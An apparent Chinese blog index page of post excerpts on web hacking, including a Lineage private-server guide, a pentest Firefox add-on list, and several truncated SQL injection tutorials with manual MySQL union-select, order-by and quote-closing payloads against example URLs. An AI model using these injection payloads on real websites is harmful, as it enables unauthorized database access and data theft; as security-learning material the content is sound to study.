摘要：此篇文章 內容大部份連結 已失效， 我已另外寫一篇更快速安裝的文章。前言: 網路遊戲天堂在數年前，被日本人分析封包的方式。模擬出Lineage server端的行為。 不像天堂II，及RO是由內部洩漏出Server端程式。也由於天堂Server的熱門以至於私服人人到處架。 ... 阅读全文

摘要：[German] SQL Injection with INFORMATION_SCHEMA*******************************************************# WEBSECURITY DOCUMENTATION ## -------------------------------------- ## SQL Injection with INFORMATION_SCHEMA ## --------------------------... 阅读全文

摘要：PHP+MySQL 手工注入语句大全 推荐我PHP手工太菜了， 无奈只能补下PHP MYSQL手工注射，把收集总结的资料分享下。暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5…..n/*利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select version() /*and 1=2 union all select database() 阅读全文

摘要：False SQL Injection and Advanced Blind SQL Injection########################################################################## ## Exploit Title: False SQL injection and advanced blind SQL injection ## Date: 21/12/2011 ## Author: wh1ant ## Company: trinitysoft ## Group: secu... 阅读全文

摘要：渗透测试必备-Firefox全套渗透装工欲善必先利其器，firefox一直是各位渗透师必备的利器，小编这里推荐34款firefox渗透测试辅助插件其中包含渗透测试、信息收集、代理、加密解密等功能。1：FirebugFirefox的 五星级强力推荐插件之一，不许要多解释2：User Agent Switcher改变客户端的User Agent的一款插件3：Hackbar91ri.org的攻城师们的必备工具，提供了SQL注入和XSS攻击，能够快速对字符串进行各种编码。4：HttpFox监测和分析浏览器与web服务器之间的HTTP流量5：Live HTTP Headers即时查看一个网站的HTTP头 阅读全文

摘要：字符形注入：先加引号报错后检测http://www.hacker.com/abc.php?text=abc'and '1'='1前面先闭合 后面1 没有闭合是因为程序本身有闭合后检测http://www.hacker.com/abc.php?text=abc'order by 1--http://www.hacker.com/abc.php?text=abc'order by 111111111--仔细检查是否正常和出错联合查询unionhttp://www.hacker.com/abc.php?text=abc'and 1=2 unio 阅读全文